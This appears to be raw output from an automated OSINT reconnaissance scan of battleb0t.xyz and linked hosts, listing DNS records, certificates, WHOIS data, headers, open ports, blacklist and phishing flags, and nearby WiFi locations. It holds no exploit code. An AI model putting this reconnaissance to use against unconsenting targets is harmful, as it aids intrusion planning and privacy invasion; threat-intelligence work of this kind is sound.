"2022-11-09T14:16:47.770763186Z"}, "tiaticviwatch.cf": {"record_type": "AAAA", "resolved_at": "2023-05-03T12:47:13.799688411Z"}, "myecorpartwildbet.tk": {"record_type": "AAAA", "resolved_at": "2023-04-28T22:47:31.486765688Z"}, "fisbopowertools.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T14:43:38.993993919Z"}, "dgvsm.com": {"record_type": "AAAA", "resolved_at": "2023-03-18T21:11:44.668409595Z"}, "it-a-br-newcarok.live": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:23:19.166151443Z"}, "buyulti-charge.com": {"record_type": "AAAA", "resolved_at": "2023-05-02T14:32:56.241553693Z"}, "ritsar.abk.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-03T22:17:27.736952452Z"}, "www.advocateclaims.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T13:25:19.560491085Z"}, "hkjku-liop.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-04-21T17:17:14.415081307Z"}, "hotel-taormina.info": {"record_type": "AAAA", "resolved_at": "2023-05-04T18:10:13.310895111Z"}, "blacklotusaudio.com": {"record_type": "AAAA", "resolved_at": "2023-01-02T13:02:23.981054734Z"}, "cdn.babeenineurope.com": {"record_type": "CNAME", "resolved_at": "2023-04-30T19:28:04.759393053Z"}, "routsaygeehekdest.ga": {"record_type": "AAAA", "resolved_at": "2023-04-14T02:12:59.832119313Z"}, "www.farasoacademy.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T14:37:26.546680400Z"}, "slanchogled.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-07T10:10:31.489137012Z"}, "www.mischerhexe.de": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:40:14.150921538Z"}, "gjtyew-bodf.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T20:28:09.792148401Z"}, "brousebiology.com": {"record_type": "AAAA", "resolved_at": "2023-02-02T13:05:34.500687558Z"}, "www.brevardnc.org": {"record_type": "AAAA", "resolved_at": "2023-05-07T21:13:44.303349330Z"}, "dubadub.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T14:40:56.310744261Z"}, "martohacabe.ga": {"record_type": "AAAA", "resolved_at": "2023-05-07T17:27:25.826314650Z"}, "road.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-05T20:38:50.973706563Z"}, "searchtermresults.com": {"record_type": "AAAA", "resolved_at": "2023-04-27T16:36:47.951727992Z"}, "artisttel.com": {"record_type": "AAAA", "resolved_at": "2023-04-14T17:49:46.342407896Z"}, "www.24hrupdate.online": {"record_type": "AAAA", "resolved_at": "2023-03-22T20:33:59.416609462Z"}, "www.sripersada.com": {"record_type": "AAAA", "resolved_at": "2022-11-19T14:03:00.698431487Z"}, "kids.abk.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-07T22:13:24.698234660Z"}, "sentimelt.com": {"record_type": "AAAA", "resolved_at": "2023-04-23T16:01:11.742725624Z"}, "walledgarden.global": {"record_type": "AAAA", "resolved_at": "2023-05-03T00:39:45.829214813Z"}, "xn--b1agjto.xn--p1acf": {"record_type": "AAAA", "resolved_at": "2023-05-01T03:13:25.943966163Z"}, "fatdomisecools.cf": {"record_type": "AAAA", "resolved_at": "2023-05-11T12:54:22.776371266Z"}, "webmail.buyulti-charge.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:07:59.090137905Z"}, "renalfa.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:47:46.479184263Z"}, "mujeresalaobra.org": {"record_type": "AAAA", "resolved_at": "2023-05-08T21:50:08.391075868Z"}, "hbomedtoday.com": {"record_type": "AAAA", "resolved_at": "2023-05-09T14:49:34.524954322Z"}, "nieqiulemoru.gq": {"record_type": "AAAA", "resolved_at": "2023-05-03T17:22:24.190764207Z"}, "tegafoods.mx": {"record_type": "AAAA", "resolved_at": "2023-04-26T19:27:47.975723009Z"}, "www.a2zbiotics.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-04-28T20:07:55.631943899Z"}, "aaditrifood.com": {"record_type": "AAAA", "resolved_at": "2022-09-30T12:45:20.759363789Z"}, "baklibabsaringram.cf": {"record_type": "AAAA", "resolved_at": "2023-05-07T12:50:08.988220251Z"}, "www.judedeveraux.com": {"record_type": "AAAA", "resolved_at": "2022-12-24T13:29:43.200670281Z"}, "ylcaloketpmentluv.gq": {"record_type": "AAAA", "resolved_at": "2022-12-13T15:15:42.169837303Z"}, "certidao.srv.br": {"record_type": "AAAA", "resolved_at": "2023-05-10T12:45:01.697407879Z"}, "anactikazida.ga": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:52:35.596026353Z"}, "abkapp.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-04-16T21:06:58.495246539Z"}, "certifiedlocal.org": {"record_type": "AAAA", "resolved_at": "2023-05-03T04:18:58.146026898Z"}, "www.cienciaexamanismo.com.br": {"record_type": "AAAA", "resolved_at": "2022-10-28T12:17:10.511292940Z"}, "conimexsa.com": {"record_type": "AAAA", "resolved_at": "2023-05-09T14:25:21.075230785Z"}, "neglectmillspark.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-07T12:49:27.362981875Z"}, "brevardnc.org": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:15:03.687712788Z"}, "garluco.ga": {"record_type": "AAAA", "resolved_at": "2023-04-27T18:33:39.654380379Z"}, "auth.gay": {"record_type": "AAAA", "resolved_at": "2023-05-08T17:54:43.280273275Z"}, "www.tizhoo.ir": {"record_type": "AAAA", "resolved_at": "2022-12-03T15:10:06.028885766Z"}, "nencafuvilate.ml": {"record_type": "AAAA", "resolved_at": "2023-05-10T18:02:40.500759466Z"}, "gusteiplexmola.tk": {"record_type": "AAAA", "resolved_at": "2023-03-27T05:18:03.996467271Z"}, "diageherpost.ga": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:33:56.882157561Z"}, "pennportcoun.tk": {"record_type": "AAAA", "resolved_at": "2023-05-01T20:45:04.713699318Z"}, "zunbazapecomfo.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:52:13.680560969Z"}, "tiosmarigin.tk": {"record_type": "AAAA", "resolved_at": "2023-03-11T19:39:44.575906671Z"}, "ndkfe-vjwc.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-05-03T00:07:50.549712076Z"}, "buvade.ml": {"record_type": "AAAA", "resolved_at": "2023-04-27T19:50:04.921168507Z"}, "webmail.sylhetbarta24.com": {"record_type": "AAAA", "resolved_at": "2023-02-11T14:21:26.991769121Z"}, "autodiscover.dfwtaxi.org": {"record_type": "AAAA", "resolved_at": "2023-05-07T21:15:13.192169963Z"}, "vpn-home.mycloudcontroller.com": {"record_type": "AAAA", "resolved_at": "2023-05-06T15:34:10.626225602Z"}, "merrellphboots.com": {"record_type": "AAAA", "resolved_at": "2022-11-30T19:31:43.146946537Z"}, "webdisk.cienciaexamanismo.com.br": {"record_type": "AAAA", "resolved_at": "2022-11-02T12:25:12.468054624Z"}, "nsdkfj-gier90.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-05-03T16:47:18.914465870Z"}, "webmail.cienciaexamanismo.com.br": {"record_type": "AAAA", "resolved_at": "2022-10-24T12:18:30.715835062Z"}, "mail.kasabugraphics.com": {"record_type": "AAAA", "resolved_at": "2023-05-05T14:52:30.444010315Z"}, "www.babeenineurope.com": {"record_type": "CNAME", "resolved_at": "2023-04-21T22:27:44.166657192Z"}, "jadehost.xyz": {"record_type": "AAAA", "resolved_at": "2022-11-02T17:53:20.233482468Z"}, "searhasbsub.tk": {"record_type": "AAAA", "resolved_at": "2023-05-11T21:42:54.350620579Z"}, "vikk-play.space": {"record_type": "AAAA", "resolved_at": "2023-01-29T18:05:12.078217209Z"}, "edocoutercenma.ml": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:29:25.411014530Z"}}, "names": ["go789.ga", "hotel-taormina.info", "webmail.cienciaexam | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:54:57 | Physical Location | No | Censys | 1 | 0 | 2 | 0 | None | Hounslow, England, TW3, United Kingdom, Europe | 2a06:98c1:3120::1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | jeja.pl (Category: misc)
https://www.jeja.pl/user,login | login |
| 2023-05-12 03:04:06 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [64.226.80.0/20]
https://blocklist.greensnow.co/greensnow.txt | 64.226.80.0/20 |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@ecloanmoney.com | [{u'page_text': None, u'domain': u'ecloanmoney.com', u'virus_total': u'Yes', u'n_times_seen_ip': 0, u'abuse_contact': u'abuse@ecloanmoney.com', u'ip': u'104.21.6.166', u'google_safebrowsing': u'Yes', u'threat_crowd': u'Yes', u'n_times_seen_domain': 0, u'alexa_rank_host': None, u'id': 8064681, u'city': u'', u'abuse_ch_malware': u'No', u'countrycode': u'US', u'title': u'Not Acceptable!', u'ssl_subject': None, u'technology': None, u'date_update': u'2022-01-16T13:03:33.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': 4.5, u'vulns': None, u'latitude': u'37.7510', u'regionname': u'', u'hash': u'16279a2e936344880462a47af65885b3a095b205bf036efd2e68751b3aa57f5b', u'threat_crowd_subdomain_count': 0, u'screenshot': None, u'n_times_seen_host': 0, u'ssl_issuer': None, u'domain_registered_n_days_ago': 399, u'regioncode': u'', u'host': u'ecloanmoney.com', u'date': u'2022-01-16T12:11:21.000Z', u'asn': u'AS13335', u'tags': u'cdn', u'bgp': u'104.16.0.0/12', u'url': u'https://ecloanmoney.com/dhl/card.php', u'isp': u'CLOUDFLARENET, US', u'longitude': u'-97.8220', u'ports': u'80, 443, 2086, 2087, 2096, 8080, 8443', u'countryname': u'United States', u'threat_crowd_votes': u'Suspicious', u'http_server': None, u'tld': u'com', u'os': None, u'http_code': 403}] |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | forumprawne.org (Category: misc)
https://forumprawne.org/members/login.html | login |
| 2023-05-12 02:44:17 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:5e:3d:7d:a9:f5:42:9c:1d:2f:03:2d:1b:0d:2f:10:cb:50:
f1:b5:52:99:81:26:41:e3:0e:8b:3f:d6:44:9c:4d:76:a0:c9:
2e:6c:74:7c:a4:74:32:5e:57:3b:4d:1a:2e:c8:ca:50:8a:41:
64:52:bd:34:33:b5:79:5d:6f:b7:40:8d:f2:19:bb:9c:7a:f4:
53:d5:b8:14:be:47:eb:83:11:3f:9b:a8:6d:e6:50:9c:00:fd:
45:a4:e9:b5:c8:1a:e6:9f:65:a0:32:31:9a:f4:eb:55:67:d1:
e8:ef:64:3e:f6:9d:83:1d:d7:4f:bc:78:a6:79:31:b0:72:dc:
bc:76:08:92:82:2c:2d:62:96:6a:ea:10:aa:8b:9f:01:37:82:
68:e8:21:18:0b:93:ec:a2:d9:e4:7d:db:8d:03:6c:29:66:26:
48:37:dc:c6:b4:07:9f:89:13:5d:3c:d0:15:d9:f0:41:fb:6f:
a6:03:d7:5c:9d:60:ab:11:be:88:8c:49:85:6b:01:3f:1f:cf:
9f:fe:17:89:e9:00:42:c3:57:e3:c8:42:f8:cd:c4:7b:bc:1f:
29:1b:d5:94:0f:7c:11:23:e1:b3:ae:8d:51:5a:7e:0b:bb:e0:
95:37:98:35:9f:61:ad:e4:68:dc:1c:77:b3:9e:f7:ce:95:dd:
52:35:dd:a6
| battleb0t.xyz |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 6 | 0 | None | MarkMonitor Inc. | Domain Name: GOOGLEUSERCONTENT.COM
Registry Domain ID: 1528918319_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-10-16T09:27:01Z
Creation Date: 2008-11-17T15:58:29Z
Registry Expiry Date: 2023-11-17T15:58:29Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.GOOGLE.COM
Name Server: NS2.GOOGLE.COM
Name Server: NS3.GOOGLE.COM
Name Server: NS4.GOOGLE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000407.github.io]
https://www.openphish.com/feed.txt | 000407.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-timer: S1683860053.050131,VS0,VE21 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:54:14 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:14 GMT", "content-type": "text/html"} | kekw.battleb0t.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, SC, United States, US |
| 2023-05-12 02:58:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D0:FF:78:AE:C3:62:89:90:F2:A9:F6:
CF:41:A5:B6:AB:51:6D:6E:FB:5E:D8:9D:88:9E:50:39:
26:BD:EC:AC:34:02:21:00:BC:89:FB:E2:F1:35:F7:00:
0B:4C:4C:DE:C4:12:88:E0:4F:52:7D:18:21:0D:AC:62:
BC:76:DD:A2:F8:3F:5B:1D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:51:94:B0:CF:3C:86:38:A4:D9:80:6F:E3:
EC:3D:37:CB:B4:65:E2:35:17:5E:BA:96:76:F4:A6:90:
1D:6A:AE:4B:02:21:00:9D:89:ED:FC:FA:3F:52:5C:6A:
FF:DA:D2:C4:54:F3:CB:81:7B:1B:4B:4F:01:26:9F:C1:
04:B7:D6:CE:B9:77:B8
Signature Algorithm: sha256WithRSAEncryption
91:4e:e2:bf:36:57:41:de:a3:6f:91:fb:a2:73:ec:c8:9e:f7:
1f:0d:59:7b:c6:09:e3:fb:bf:a4:c2:8a:32:fa:c4:f6:df:3f:
aa:05:e0:24:98:16:08:84:62:26:41:b9:6f:39:f4:71:d6:ee:
5c:b1:36:f4:e8:21:c1:33:ce:b6:3c:af:4d:e7:18:2f:6c:27:
6e:cd:40:66:5d:d7:bd:71:74:93:04:96:39:63:25:d2:be:99:
3b:37:81:f8:a4:eb:0b:81:a4:3b:25:e3:9f:76:85:e0:0f:1a:
92:b6:27:46:71:61:51:3a:f7:5d:72:65:00:9d:09:05:5c:de:
c1:d4:54:d5:5a:d7:d7:34:d4:2c:67:0d:f8:a4:f0:c4:3a:47:
80:3c:8b:81:06:a8:34:d6:42:45:55:c8:42:f9:cf:43:4d:ee:
bd:e9:55:d7:d8:77:a3:d9:4c:76:08:4a:3c:a8:97:42:30:c9:
07:48:ea:bf:5e:b8:93:d2:56:00:0f:04:1c:00:01:69:ac:de:
20:d1:8a:7a:88:01:7c:94:e0:3d:d3:30:5e:a9:3c:d3:38:56:
5b:30:14:08:f5:b9:a1:f9:56:6c:72:be:02:ce:ad:d8:53:46:
35:20:ba:70:c5:77:bf:fa:4e:08:fb:a6:cd:30:77:f4:dc:52:
90:b6:5b:91
| ayhu.xyz |
| 2023-05-12 03:11:24 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14805058800', u'local': u'(480) 505-8800'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14805058800', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14805058800 |
| 2023-05-12 03:29:46 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.169) | 207.154.228.169 |
| 2023-05-12 02:55:21 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["46"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "X_Xss_Protection": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8"}, "X_Xss_Protection": ["1; mode=block"], "X_Content_Type_Options": ["nosniff"], "Vary": ["Origin"], "Server": ["Caddy"], "Content_Type": ["application/json; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"]} | 207.154.228.169 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, 29415, United States, North America |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101kvmt.github.io | 185.199.111.153 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Git (software) | battleb0t.github.io |
| 2023-05-12 02:44:12 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz:443 | www.battleb0t.xyz |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:31 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-111-154.github.com | 185.199.111.154 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.127): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:35:41 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | Eygelshoven, Limburg, LI, Netherlands, NL | 45.131.109.53 |
| 2023-05-12 02:47:30 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 104.21.6.166:443 | 104.21.6.166 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maxx Hotel (Net ID: 00:02:2D:37:37:61) | 50.1188, 8.6843 |
| 2023-05-12 02:44:12 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.103 | 87.248.157.102 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001328.github.io | 185.199.111.153 |
| 2023-05-12 03:04:12 | Malicious Co-Hosted Site | Yes | abuse.ch | 0 | 1 | 2 | 0 | None | abuse.ch URLhaus (Domain) [github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | github.com |
| 2023-05-12 02:53:03 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.780462,-122.390564 |
